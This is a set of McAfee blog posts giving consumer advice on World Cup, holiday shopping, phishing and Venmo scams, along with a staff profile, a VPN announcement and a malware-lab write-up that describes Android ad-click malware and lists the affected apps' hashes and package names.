Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender email whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information. 

It’s important to realize that these messages can come via a variety of channels, including email, text messages, (also known as smishing) and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.  

For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog. 

Real money for fake tickets 

According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.  


The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:  

The red box on the right image shows that the ticket site accepts payment via Bitcoin.  

Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp. 

Streaming the matches 

Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.  

Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.  

Don’t get taken to the bank 

In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.   

As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to or search for gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it and are even sometimes asked to deposit even more money to make winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and then some, potentially) as well as any personal information they shared on the site.  

Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check. 

For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.  

Keep that Connection Secure 

Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching the them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection. 

Give scammers a straight red card this World Cup 

For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!  

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

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The Worst Black Friday and Cyber Monday Scams – And How to Avoid Them

By McAfee — November 1st 2022 at 09:51

On Black Friday and Cyber Monday, the deals roll out. So do some of the worst Black Friday and Cyber Monday scams. 

Hackers, scammers, and thieves look to cash in this time of year by blending in with the holiday rush, spinning up their own fake shipping notices, phony deals, and even bogus charities that look legitimate at first glance, yet are anything but. Instead, they may be loaded with malware, point you to phishing sites that steal your personal info, or they may simply rip you off.   

Classically, many online scams play on emotions by creating a sense of urgency or even fear. And for the holidays, you can throw stress into that mix as well—the stress of time, money, or even the pressure of finding that hard-to-get gift that seems to be out of stock everywhere. The bad actors out there will tailor their attacks around these feelings, hoping that they’ll catch you with your guard down during this busy time of year. 

”The Five Least Wanted” – Top online shopping scams to avoid 

So while knowing how to spot a great gift at a great price is solid skill to have this time of year, so is the ability to spot a scam. Let’s look at some of the worst ones out there, along with what you can do to steer clear of them. 

1) The fake order scam  

Come this time of year, keeping tabs on all the packages you have in transit can get tricky. You may have an armload of them enroute at any given time, and scammers will look to slip into this mix with phony order confirmations sent to your mailbox or your phone by text. Packed with either an email attachment or a link to a bogus website, they’ll try to get you to download malware or visit a site that attempts to steal your identity.  

These messages can look quite legit, so the best way to keep track of your orders is on the sites where you purchased them. Go directly to those sites rather than clicking on any links or attachments you get. 

2) The phony tracking number scam 

This scam plays out much like the fake order scam, yet in this case the crooks will send a phony package tracking notification, again either as a link or as an attachment. For starters, legitimate retailers won’t send tracking numbers in an attached file. If you see anything like that, it’s surely a scam designed to inject malware onto your device. In the case of a link, the scammers aim to send you to a site that will steal your personal info, just like in the case above.  

Once again, the best way to track your packages is to go to the source. Visit the online store where you made your purchase, open your current orders, and get your package tracking information from there. 

3) The bogus website scam  

A classic scammer move is to “typosquat” phony email addresses and URLs that look awfully close to legitimate addresses of legitimate companies and retailers. So close that you may overlook them. They often appear in phishing emails and instead of leading you to a great deal, these can in fact link you to scam sites that can then lift your login credentials, payment info, or even funds should you try to place an order through them.  

You can avoid these sites by going to the retailer’s site directly. Be skeptical of any links you receive by email, text, or direct message—it’s best to go to the site yourself by manually typing in the legitimate address yourself and look for the deal there.  

4) The hot deal scam  

At the heart of holiday shopping is scarcity. And scarcity is something scammers love. There’s always some super-popular holiday item that’s tough to find, and scammers will spin up phony websites and offers around those items to lure you in. They may use the typosquatting technique mentioned above to pose as a legitimate retailer, or they may set up a site with their own branding to look legitimate on their own (or at least try). Either way, these scams can hurt you in a couple of ways—one, you’ll pay for the goods and never receive them; and two, the scammers will now have your payment info and address, which they can use to commit further fraud. 

If the pricing, availability, or delivery time all look too good to be true for the item in question, it may be a scam designed to harvest your personal info and accounts. Use caution here before you click. If you’re unsure about a product or retailer, read reviews from trusted websites to help see if it’s legitimate. (The Better Business Bureau is a great place to start—more on that in moment.) 

5) The fake charity scam 

In the season of giving, donating to charities in your name or in the name of others makes for a popular holiday gesture. Scammers know this too and will set up phony charities to cash in. Some indications that a phony charity has reached you include an urgent pitch that asks you to “act now.” A proper charity will certainly make their case for a donation, yet they won’t pressure you into it. Moreover, phony charities will outright ask for payment in the form of gift cards, wire transfers (like Western Union), money orders, or even cryptocurrency—because once those funds are sent, they’re nearly impossible to reclaim when you find out you’ve been scammed. 

There are plenty of ways to make donations to legitimate charities, and the U.S. Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count 

So, how can I avoid getting scammed on Black Friday and Cyber Monday? 

Some of it takes an eagle eye that can spot these scams as they pop up in your inbox, texts, social media feed, and so on. Yet you have further ways you can keep safe while shopping on Black Friday, Cyber Monday, and any time. 

Stick with known, legitimate retailers online 

This is a great one to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

Look for the lock icon in your browser when you shop 

Secure websites begin their address with “https,” not just “http.” That extra “s” in stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website.  

Pay with a credit card instead of your debit card  

In the U.S., the Fair Credit Billing Act offers the public protection against fraudulent charges on credit cards, where citizens can dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well. However, debit cards aren’t afforded the same protection under the Act. Avoid using a debit card while shopping online and use your credit card instead.  

Use two-factor authentication on your accounts  

Two-factor authentication is an extra layer of defense on top of your username and password. It adds in the use of a special one-time-use code to access your account, usually sent to you via email or to your phone by text or a phone call. In all, it combines something you know, like your password, with something you have, like your smartphone. Together, that makes it tougher for a crook to hack your account. If any of your accounts support two-factor authentication, the few extra seconds it takes to set up is more than worth the big boost in protection you’ll get.  

Use a VPN if you’re shopping on public Wi-Fi  

Public Wi-Fi in coffee shops and other public locations can expose your private surfing to prying eyes because those networks are open to all. Using a virtual private network (VPN) encrypts your browsing, shopping, and other internet traffic, thus making it secure from attempts at intercepting your data on public Wi-Fi, such as your passwords and credit card numbers.  

What’s more, a VPN masks your whereabouts and your IP address, plus uses encryption that helps keep your activities private. As a result, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. 

Clean up your personal data online 

Yes, it’s true. Your information gets collected, bought, and solid online. In fact, personal information fuels a global data trading economy estimated at $200 billion U.S. dollars a year. Run by data brokers that keep hundreds and even thousands of data points on billions of people, these sites gather, analyze, buy, and sell this information to other companies as well as to advertisers. Likewise, these data brokers may sell this information to bad actors, such as hackers, spammers, and identity thieves who would twist this information for their own purposes. 

Getting your info removed from these sites can seem like a daunting task. (Where do I start, and just how many of these sites are out there?) Our Personal Data Cleanup can help by regularly scanning these high-risk data broker sites for info like your home address, date of birth, and names of relatives. It identifies which sites are selling your data, and depending on your plan, automatically requests removal. 

Protect your identity from identity thieves 

Another place where personal information is bought and sold, stored, and exchanged is the dark web. The problem is that it’s particularly difficult for you to determine what, if any, of your info is on the dark web, stashed away in places where hackers and thieves can get their hands on it. Identity monitoring can help. McAfee’s identity monitoring helps you keep your personal info safe by alerting you if your data is found on the dark web, an average of 10 months before our competitors. 

Monitored info can range anywhere from bank account and credit card numbers to your email addresses and government ID number, depending on your location. If your information gets spotted, you’ll get an alert, along with steps you can take to minimize or even prevent damage if the information hasn’t already been put to illegal use. 

Take advantage of identity protection 

Identity protection through McAfee takes identity monitoring a step further by offering, depending on your location and plan, identity theft coverage for financial losses and expenses due to identity theft, in addition to hands-on help from a recovery professional to help restore your identity—all in addition to the identity monitoring called out above, again depending on your location and plan. 

Monitor your credit 

Keeping an eye on your bills and statements as they come in can help you spot unusual activity on your accounts. A credit monitoring service can do that one better by keeping daily tabs on your credit report. While you can do this manually, there are limitations. First, it involves logging into each bureau and doing some digging of your own. Second, there are limitations as to how many free credit reports you can pull each year. A service does that for you and without impacting your credit score. 

Depending on your location and plan, McAfee’s credit monitoring allows you to look after your credit score and the accounts within it to see fluctuations and help you identify unusual activity, all in one place, checking daily for signs of identity theft. 

Use protection while you shop  

A complete suite of online protection software like McAfee+ can offer layers of extra security while you shop. In addition to the VPN, identity, credit monitoring, and other features mentioned above, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—along with a password manager that can create strong, unique passwords and store them securely as well. Taken together, McAfee+ offers all-in-one online protection for your identity, privacy, and security that can keep you far safer when you shop online—and as you spend your time online in general. 

What should I do if I fall victim to a Black Friday or Cyber Monday scam? 

Even if you take the proper precautions the unexpected can happen. Whether it’s a scam, an identity crime, or flat-out theft, there are steps you can take right away to help minimize the damage. 

The first bit of advice is to take a deep breath and get right to work on recovery. From there, you can take the following steps: 

1. Notify the companies involved 

Whether you spot a curious charge on your bank statement, discover potentially a fraudulent account when you check credit report, or when you get an alert from your monitoring service, let the bank or organization involved know you suspect fraud or theft. With a visit to their website, you can track down the appropriate number to call and get the investigation process started. 

2. File a police report 

Some businesses will require you to file a local police report and acquire a case number to complete your claim. Beyond that, filing a report is a good idea in itself. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well. 

3. Contact your governmental anti-fraud or trade organization 

In the U.S., the identity theft website from the Federal Trade Commission (FTC) is a fantastic resource should you find yourself in need. In addition to keeping records of the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. With a copy of your report, you can ask debtors to stop. 

4. Put on a credit freeze or lock 

An instance of identity fraud or theft, suspected or otherwise, is a good time to review your options for a credit freeze or lock. As mentioned earlier, see what the credit bureaus in your region offer, along with the terms and conditions of each. With the right decision, a freeze or lock can help minimize and prevent further harm. 

5. Continue to monitor 

Strongly consider using a monitoring service like the one we described earlier to help you continue to keep tabs on your identity. The unfortunate fact of identity theft and fraud is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity all around. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely—along with utilizing an identity monitoring service. 

6. Work with a recovery pro 

A recovery service can help you clean up your credit in the wake of fraud or theft, all by working on your behalf. Given the time, money, and stress that can come along with setting your financial record straight, leaning on the expertise of a professional can provide you with much-needed relief on several counts. 

Take an extra moment to spot those Black Friday and Cyber Monday scams  

Just as it’s always been, hackers, scammers, and thieves want to ruin a good thing. In this case, it’s your spirit of giving and sharing in the holiday season. Yet with this list of top scams and ways you can avoid them, you can keep bad actors like them at bay. Remember, they’re counting on you to be in a hurry this time of year, and maybe a bit stressed and a little disorganized to boot. Take your time while shopping out there and keep an eye out for their tricks. That extra moment can save you far more time and money than you may think. 

The post The Worst Black Friday and Cyber Monday Scams – And How to Avoid Them appeared first on McAfee Blog.

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For some, accounting is more than just spreadsheets! Vernon’s McAfee Journey

By Life at McAfee — October 26th 2022 at 14:32

Vernon has been our Manager of Technical Accounting for more than two years, but that doesn’t mean he’s busy with spreadsheets and numbers all day.

My McAfee career journey story

It’s been an amazing ride so far. My team touches on several areas of responsibility, including financial period closing, financial reporting, and accounting for complex transactions.

​​​​​​​The most rewarding part of my role is definitely the variety and complexity – they really go hand-in-hand and I enjoy asking questions and figuring out the solutions, even when there is not always a textbook answer. I enjoy the challenge of working collectively with a team to find solutions by applying research and experience to a set of facts.

It’s also rewarding to be able to collaborate with auditors and other stakeholders who would be interested in the results.

Talent and collaboration – a rare combo

​​​​​​​My favorite thing about working at McAfee is the team. We have an amazing team. It’s full of really smart people. I’ve seen some companies try and find the best talent they can, but McAfee has just taken that to a whole different level. Everyone in their respective areas is really tuned in to the broader effort and we work well together. At McAfee, we enjoy both a high level of talent and collaborative effort. You don’t often find both in the same place. ​​​​​​​

My leadership philosophy

I really believe that each person brings certain strengths to the table, and they should be able to exercise those strengths to develop and expand their capabilities. Once those natural roles are established, it’s best to trust them to determine how best to perform in their roles and collaborate with the team in achieving results that add value to the broader group.

My advice for anyone looking to drive their career forward is

​​​​​​​First, expect the unexpected – consider each new experience an opportunity for personal growth.

Secondly, get involved in projects. If you have the opportunity to do something different or work with a cross-functional team, do it. It builds your own skill base, which opens the door for greater future opportunities and you get to meet people outside of your own department and develop relationships that may prove valuable over time.

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New Malicious Clicker found in apps installed by 20M+ users

By McAfee Labs — October 19th 2022 at 18:09

Authored by SangRyol Ryu

Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many mobile malwares masquerading as a useful tool or utility, and automatically crawling ads in the background. Recently the McAfee Mobile Research Team has identified new Clicker malware that sneaked into Google Play. In total 16 applications that were previously on Google Play have been confirmed to have the malicious payload with an assumed 20 million installations.

McAfee security researchers notified Google and all of the identified apps are no longer available on Google Play. Users are also protected by Google Play Protect, which blocks these apps on Android. McAfee Mobile Security products detect this threat as Android/Clicker and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.

How it works

The malicious code was found on useful utility applications like Flashlight (Torch), QR readers, Camara, Unit converters, and Task managers:

Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. At first glance, it seems like well-made android software. However, it is hiding ad fraud features behind, armed with remote configuration and FCM techniques.

Attribute name Known meaning of the value
FCMDelay Initial start hours after first installation
adButton Visivility of a button of Advertisement
adMob AdMob unit ID
adMobBanner AdMob unit ID
casOn Whether CAS library works or not
facebookAd FaceBook Ad ID
fbAdRatio Ratio of FB AD
googleAdRatio Ratio of AdMob
is Decide BootService to run or not
urlOpen to open popup or not when starts PowerService
popUrl URL for PowerService
popUpDelay Delay time for PowerService
liveUrl URL for livecheck service
pbeKey Key for making unique string
playButtonList URL for other service
reviewPopupDialog  ‘y’ it shows review dialog
tickDelay Delay time for TickService
tickEnable Value of TickService enabled
tickRandomMax Value of TickService random delay
tickRandomMin Value of TickService random delay
tickType Set the type of TickService
updateNotiVersion Value for showing update activity


The FCM message has various types of information and that includes which function to call and its parameters. The picture below shows some of FCM message history:

When an FCM message receives and meets some condition, the latent function starts working. Mainly, it is visiting websites which are delivered by FCM message and browsing them successively in the background while mimicking user’s behavior. This may cause heavy network traffic and consume power without user awareness during the time it generates profit for the threat actor behind this malware. In the picture below there is an example of the network traffic generated to get the information required to generate fake clicks and the websites visited without user’s consent or interaction:

Malicious components: CAS and LivePosting

So far, we have identified two pieces of code related to this threat. One is “” library which focuses on the automated clicking functionality while “com.liveposting” library works as an agent and runs hidden adware services:

Depending on the version of the applications, some have both libraries working together while other applications only have “com.liveposting” library. The malware is using installation time, random delay and user presence to avoid the users from noticing these malicious acts. The malicious behavior won’t start if the installation time is within an hour and during the time the user is using the device, probably to stay under the radar and avoid being detected right away:


Clicker malware targets illicit advertising revenue and can disrupt the mobile advertising ecosystem. Malicious behavior is cleverly hidden from detection. Malicious actions such as retrieving crawl URL information via FCM messages start in the background after a certain period of time and are not visible to the user.

McAfee Mobile Security detects and removes malicious applications like this one that may run in the background without user’s knowledge. Also, we recommend having a security software installed and activated so you will be notified of any mobile threats present on your device in a timely manner. Once you remove this and other malicious applications, you can expect an extended battery time and you will notice reduced mobile data usage while ensuring that your sensitive and personal data is protected from this and other types of threats.

IoCs (Indicators of Compromise)








SHA256 Package name Name Downloaded
a84d51b9d7ae675c38e260b293498db071b1dfb08400b4f65ae51bcda94b253e com.hantor.CozyCamera High-Speed Camera 10,000,000+
00c0164d787db2ad6ff4eeebbc0752fcd773e7bf016ea74886da3eeceaefcf76 com.james.SmartTaskManager Smart Task Manager 5,000,000+
b675404c7e835febe7c6c703b238fb23d67e9bd0df1af0d6d2ff5ddf35923fb3 kr.caramel.flash_plus Flashlight+ 1,000,000+
65794d45aa5c486029593a2d12580746582b47f0725f2f002f0f9c4fd1faf92c com.smh.memocalendar 달력메모장 1,000,000+
82723816760f762b18179f3c500c70f210bbad712b0a6dfbfba8d0d77753db8d com.joysoft.wordBook K-Dictionary 1,000,000+
b252f742b8b7ba2fa7a7aa78206271747bcf046817a553e82bd999dc580beabb com.kmshack.BusanBus BusanBus 1,000,000+
a2447364d1338b73a6272ba8028e2524a8f54897ad5495521e4fab9c0fd4df6d com.candlencom.candleprotest Flashlight+ 500,000+
a3f484c7aad0c49e50f52d24d3456298e01cd51595c693e0545a7c6c42e460a6 com.movinapp.quicknote Quick Note 500,000+
a8a744c6aa9443bd5e00f81a504efad3b76841bbb33c40933c2d72423d5da19c com.smartwho.SmartCurrencyConverter Currency Converter 500,000+
809752e24aa08f74fce52368c05b082fe2198a291b4c765669b2266105a33c94 com.joysoft.barcode Joycode 100,000+
262ad45c077902d603d88d3f6a44fced9905df501e529adc8f57a1358b454040 com.joysoft.ezdica EzDica 100,000+
1caf0f6ca01dd36ba44c9e53879238cb46ebb525cb91f7e6c34275c4490b86d7 com.schedulezero.instapp Instagram Profile Downloader 100,000+
78351c605cfd02e1e5066834755d5a57505ce69ca7d5a1995db5f7d5e47c9da1 com.meek.tingboard Ez Notes 100,000+
4dd39479dd98124fd126d5abac9d0a751bd942b541b4df40cb70088c3f3d49f8 com.candlencom.flashlite 손전등 1,000+
309db11c2977988a1961f8a8dbfc892cf668d7a4c2b52d45d77862adbb1fd3eb com.doubleline.calcul 계산기 100+
bf1d8ce2deda2e598ee808ded71c3b804704ab6262ab8e2f2e20e6c89c1b3143 Flashlight+ 100+


The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.

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The Seven Main Phishing Lures of Cybercriminals

By McAfee — October 10th 2022 at 13:16

One of the oldest tricks in the cybercrime playbook is phishing. It first hit the digital scene in 1995, at a time when millions flocked to America Online (AOL) every day. And if we know one thing about cybercriminals, it’s that they tend to follow the masses. In earlier iterations, phishing attempts were easy to spot due to link misspellings, odd link redirects, and other giveaways. However, today’s phishing tricks have become personalized, advanced, and shrouded in new disguises. So, let’s take a look at some of the different types, real-world examples and how you can recognize a phishing lure.

Be Wary of Suspicious Emails

Every day, users get sent thousands of emails. Some are important, but most are just plain junk. These emails often get filtered to a spam folder, where phishing emails are often trapped. But sometimes they slip through the digital cracks, into a main inbox. These messages typically have urgent requests that require the user to input sensitive information or fill out a form through an external link. These phishing emails can take on many personas, such as banking institutions, popular services, and universities. As such, always remember to stay vigilant and double-check the source before giving away any information.

Link Look-A-Likes

A sort of sibling to email phishing, link manipulation is when a cybercriminal sends users a link to malicious website under the ruse of an urgent request or deadline. After clicking on the deceptive link, the user is brought to the cybercriminal’s fake website rather than a real or verified link and asked to input or verify personal details. This exact scenario happened last year when several universities and businesses fell for a campaign disguised as a package delivery issue from FedEx. This scheme is a reminder that anyone can fall for a cybercriminals trap, which is why users always have to careful when clicking, as well as ensure the validity of the claim and source of the link. To check the validity, it’s always a good idea to contact the source directly to see if the notice or request is legitimate.

Gone Whaling

Corporate executives have always been high-level targets for cybercriminals. That’s why C-suite members have a special name for when cybercriminals try to phish them – whaling. What sounds like a silly name is anything but. In this sophisticated, as well as personalized attack, a cybercriminal attempts to manipulate the target to obtain money, trade secrets, or employee information. In recent years, organizations have become smarter and in turn, whaling has slowed down. Before the slowdown, however, many companies were hit with data breaches due to cybercriminals impersonating C-suite members and asking lower-level employees for company information. To avoid this pesky phishing attempt, train C-suite members to be able to identify phishing, as well as encourage unique, strong passwords on all devices and accounts.

Spear Target Acquired

 Just as email spam and link manipulation are phishing siblings, so too are whaling and spear-phishing. While whaling attacks target the C-suite of a specific organization, spear-phishing rather targets lower-level employees of a specific organization. Just as selective and sophisticated as whaling, spear-phishing targets members of a specific organization to gain access to critical information, like staff credentials, intellectual property, customer data, and more. Spear-phishing attacks tend to be more lucrative than a run-of-the-mill phishing attack, which is why cybercriminals will often spend more time crafting and obtaining personal information from these specific targets. To avoid falling for this phishing scheme, employees must have proper security training so they know how to spot a phishing lure when they see one.

Spoofed Content

With so many things to click on a website, it’s easy to see why cybercriminals would take advantage of that fact. Content spoofing is based on exactly that notion – a cybercriminal alters a section of content on a page of a reliable website to redirect an unsuspecting user to an illegitimate website where they are then asked to enter personal details. The best way to steer clear of this phishing scheme is to check that the URL matches the primary domain name.

Phishing in a Search Engine Pond

 When users search for something online, they expect reliable resources. But sometimes, phishing sites can sneak their way into legitimate results. This tactic is called search engine phishing and involves search engines being manipulated into showing malicious results. Users are attracted to these sites by discount offers for products or services. However, when the user goes to buy said product or service, their personal details are collected by the deceptive site. To stay secure, watch out for potentially sketchy ads in particular and when in doubt always navigate to the official site first.

Who’s That Caller?

With new technologies come new avenues for cybercriminals to try and obtain personal data. Vishing, or voice phishing, is one of those new avenues. In a vishing attempt, cybercriminals contact users by phone and ask the user to dial a number to receive identifiable bank account or personal information through the phone by using a fake caller ID. For example, just last year, a security researcher received a call from their financial institution saying that their card had been compromised. Instead of offering a replacement card, the bank suggested simply blocking any future geographic-specific transactions. Sensing something was up, the researcher hung up and dialed his bank – they had no record of the call or the fraudulent card transactions. This scenario, as sophisticated as it sounds, reminds users to always double-check directly with businesses before sharing any personal information.

As you can see, phishing comes in all shapes and sizes. This blog only scratches the surface of all the ways cybercriminals lure unsuspecting users into phishing traps. The best way to stay protected is to invest in comprehensive security and stay updated on new phishing scams.

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How to Identify and Protect Yourself From Venmo Scams and Other Cash App Scams

By McAfee — August 5th 2022 at 16:26

Have you ever been on the receiving end of a scam or heard of someone whose bank account was emptied by fraudsters 

Unfortunately, these examples are becoming increasingly common. The Better Business Bureau (BBB) shared that they receive about 1,000 scam complaints daily from cash app users. As the number of cash app users increased over the last few years, so did the number of fraudsters on payment apps like Venmo and PayPal. As a result, even the most alert people have found themselves prey to smooth-talking fraudsters. 

This article highlights common themes of cash app scams and explains how to protect your financial and personal information from scammers online. Stay tuned to learn more. 

Tips to avoid Venmo and Cash App scams

With the number of scams rising, it’s important to be more aware and cautious. So, what can you do to protect yourself from being scammed? 

Here are four essential safety tips to avoid some common Venmo scams: 

  • Never share private details like your Social Security number, bank account information, or debit card or credit card number with anyone online — even if they claim to be from the Venmo customer service team. Attackers can use the stolen credit card information to make unwanted transactions from your account. 
  • Do not send money to strangers online, no matter what they tell you. And never do business with strangers through the Venmo app. 
  • Never click on links in emails or texts supposedly sent by Venmo. Venmo mail is always sent via their official mail ID from their website: In addition, Venmo will never address you as “Dear User” or “Dear Venmo User” — they will always address you by your full name or business name. 
  • Turn the private setting on Venmo on so strangers can’t view your Venmo transaction history. 

Let’s discuss some scam tactics commonly used on money transfer apps like Venmo and how you can quickly recognize and sidestep them. 

The most common Venmo and Cash App scams

Spoofing and phishing scams are practices that trick you into revealing sensitive financial or online information, leading you to lose money and face risk  identity theft. 

Knowing common ways that an online scammer can trick you will help you stay alert. This knowledge might make it easier to recognize a fraudster. 

Let’s talk about a few common scam tactic examples, so you know the red flags to look out for when using cash apps like Venmo. 

Fake reward or cash prize

In this type of scam, a scammer will send you a text message, a notification, or an email with a link telling you that you won a cash prize or trending concert tickets on Venmo. The link generally leads to a page that asks you to sign in or provide information about your Venmo account. For example, the text could say something like, “As a long-time user of Venmo, you have received a $20 gift card from Venmo. Sign in to redeem.” Filling in these details can lead to your Venmo account being hacked. 

Prevent being scammed this way by never sharing your Venmo login information with any person or third-party website. 

A scammer may try to sign in to your Venmo account, requiring them to enter a code sent to your mobile number. They will call you, pretend to be from the Venmo tech support or customer service team, and produce any plausible reason they need you so you’ll share the code you received.  

For example, this phone call may sound like, “Hello, we have noticed some unauthorized transactions on your Venmo account. This can lead to your account being blocked. To authorize the transactions, we need to confirm that you are the real owner of this account. For authentication purposes, we sent a code to your phone. Could you share that code with me, please?” 

When in the middle of a busy work day, this call might not seem like a big deal and you may share the code without suspecting the caller of smishing. However, this code might be part of multi-factor authentication on Venmo and will give the scammer access to your account.  

This can also look a little different. For example, someone who claims to be a Venmo agent might ask you to transfer a sum of money into another account to “verify” your account. 

To avoid being scammed this way, keep in mind that a Venmo agent will never ask for a private code or try to gain access to your account. In addition, Venmo will never ask you to install a third-party app, redirect you to a different sign-in page, or ask you to send money to “verify” an account. 

As a rule of thumb, never share your Venmo verification code with anyone, no matter who they claim to be. 

Offers to make fast cash

This scam has a few names, including pyramid scheme, money circle, or cash wheel. Here, a scammer will persuade you to send them a small amount of money to earn back a larger sum within a short period. This is an easy scam to identify because you have no guarantee that the person will pay you back. However, scammers can be extremely convincing, and you may fall for their words.  

To avoid this mistake on the cash transfer app, don’t ever send money to strangers on Venmo. Remember, if it sounds too good to be true, it’s probably a scam. 

Someone posing as one of your friends

In such a scam, a scammer will attempt to impersonate someone you know. For example, a scammer is impersonating your friend “X.” They use any publicly available information about “X” and create an account using “X’s” name and picture. If “X’s” Venmo account isn’t private, the scammer can access “X’s” transaction history. And, if “X” has transacted with you in the past, the scammer posing as “X” will connect with you and request money. Usually, these requests suggest an urgent need for money. Since you know “X,” you might consider lending them the amount. 

Avoid this scam by being wary of any unusual money requests from someone who looks like a friend. Before accepting the payment request, double-check that the person requesting the money is your friend or a family member. Reach out to your friend outside of Venmo through their phone or a credible social media account to verify that it’s not a fake profile asking you for money. In addition, you should always keep your Venmo friend list and transaction history private to avoid giving scammers access to your data. 

Scams when buying or selling things online 

If you’re selling goods online, a buyer might try to obtain your goods without actually paying for your product. So, they may send you a screenshot of a fake payment to prove they have paid when you haven’t received any money.  

Sometimes, a scammer will send a screenshot showing that they accidentally paid you an extra sum of money, and may ask you to pay the money back. However, their payment was fake, and you will end up paying money from your pocket.  

Another example involves a seller who sends a message that seems like it’s from Venmo. The message might say that the buyer made a payment, but it will only be fully processed once goods are shipped. Again, this is a red flag to watch out for because Venmo doesn’t offer this feature. 

If you’re a buyer online, your seller may convince you to Venmo them the entire payment, and then they may refuse to ship the purchased goods to you. 

To be protected from such scams, avoid selling and buying items using Venmo. If you’re buying from strangers on Venmo, ensure it is a Venmo-approved business account so you have purchase protection for any eligible items covered under the user agreement. 

As a rule, it’s best not to exchange Venmo payments with strangers. Consider blocking the user if you receive an unsolicited payment or a payment request from a stranger on Venmo. 

How to protect yourself from Venmo and Cash App scams

As transactions become increasingly digital, it’s important to educate yourself about the best practices to protect your financial information online. 

Here are some general tips to follow: 

  • Never reveal personal codes, financial details, bank information, private one-time codes, or passwords to anyone online. 
  • Remember that no one from the Venmo team will ever ask for one-time passwords, just like no one from your bank would ask you to reveal private details or codes. 
  • Be aware of current scams so you can recognize one when you see it. 

Online safety should not be taken lightly, and investing in an advanced tool is a good idea to ensure your cybersafety. 

Protect yourself from dangerous threats online with McAfee

If you’re serious about online safety and security, the McAfee+ Protection package is a great investment. This package gives you a premium level of online security, with full protection from things like identity theft. In addition, you get access to antivirus software for unlimited devices, personal data clean-ups, lost wallet protection, and a secure VPN — among other benefits. Sign up today! 

The post How to Identify and Protect Yourself From Venmo Scams and Other Cash App Scams appeared first on McAfee Blog.

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McAfee Secure VPN: Now with WireGuard for Faster Speeds and Enhanced Stability

By Cagla Ruacan — September 29th 2022 at 13:00

McAfee’s Secure VPN now supports the WireGuard protocol, which gives you faster connection speeds plus enhanced stability and security.  

WireGuard is the latest standard in Virtual Private Network (VPN) technology, and we’re rolling it out across McAfee Secure VPN for Windows which is included in our comprehensive online protection plans. And just as before, it offers smart protection that can be set to automatically turn on when you need it, so you can stay more private and more secure online. 

If you’re new to using a VPN, let’s take a quick look at two of the big things a VPN can do for you. 

It makes you more secure. 

